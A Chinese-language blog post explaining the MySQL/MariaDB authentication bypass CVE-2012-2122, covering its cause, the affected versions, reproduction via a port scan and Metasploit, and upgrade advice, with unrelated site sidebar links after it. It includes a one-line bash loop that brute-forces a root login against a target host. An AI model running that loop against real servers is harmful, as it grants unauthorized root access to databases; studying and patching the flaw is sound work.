当前位置:网站首页>Mysql 身份认证绕过漏洞(CVE-2012-2122)
Mysql 身份认证绕过漏洞(CVE-2012-2122)
2022-07-06 15:32:00 【OOOOOK.2021】
漏洞简介
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp () 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
受影响版本
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL
- versions from 5.1.63, 5.5.24, 5.6.6 are not.
出现原因
出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。大约256次就可以成功一次。
漏洞复现
扫描开放的端口
用MSF攻击
EXP
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
修复
升级MySQL版本,(低于以下版本的都必须升级到最新版本:5.0版本低于5.0.96;5.1版本低于5.1.63;5.5版本低于5.5.25)停止mysql,备份整个mysql,安装目录,data目录(这个步骤只是预防升级
边栏推荐
- Windows auzre background operation interface of Microsoft's cloud computing products
- Netxpert xg2 helps you solve the problem of "Cabling installation and maintenance"
- 自定义 swap 函数
- sizeof关键字
- Aardio - 封装库时批量处理属性与回调函数的方法
- 将MySQL的表数据纯净方式导出
- NPDP certification | how do product managers communicate across functions / teams?
- 如何用程序确认当前系统的存储模式?
- Aardio - 通过变量名将变量值整合到一串文本中
- GD32F4XX串口接收中断和闲时中断配置
猜你喜欢
关于声子和热输运计算中BORN电荷和non-analytic修正的问题
二分图判定
Export MySQL table data in pure mode
Aardio - 利用customPlus库+plus构造一个多按钮组件
(18) LCD1602 experiment
Build op-tee development environment based on qemuv8
Chapter 4: talk about class loader again
UE4蓝图学习篇(四)--流程控制ForLoop和WhileLoop
Self made j-flash burning tool -- QT calls jlinkarm DLL mode
NPDP certification | how do product managers communicate across functions / teams?
随机推荐
Aardio - Method of batch processing attributes and callback functions when encapsulating Libraries
Mise en place d'un environnement de développement OP - tee basé sur qemuv8
uniapp设置背景图效果demo(整理)
Data storage (1)
Config:invalid signature solution and troubleshooting details
Mysql database basic operations DML
Self made j-flash burning tool -- QT calls jlinkarm DLL mode
基于 QEMUv8 搭建 OP-TEE 开发环境
rust知识思维导图xmind
volatile关键字
[IELTS speaking] Anna's oral learning record part1
Uniapp setting background image effect demo (sorting)
0 basic learning C language - interrupt
qt quick项目offscreen模式下崩溃的问题处理
How to use flexible arrays?
const关键字
Signed and unsigned keywords
Void keyword
2022-07-05 使用tpcc对stonedb进行子查询测试
Windows Auzre 微软的云计算产品的后台操作界面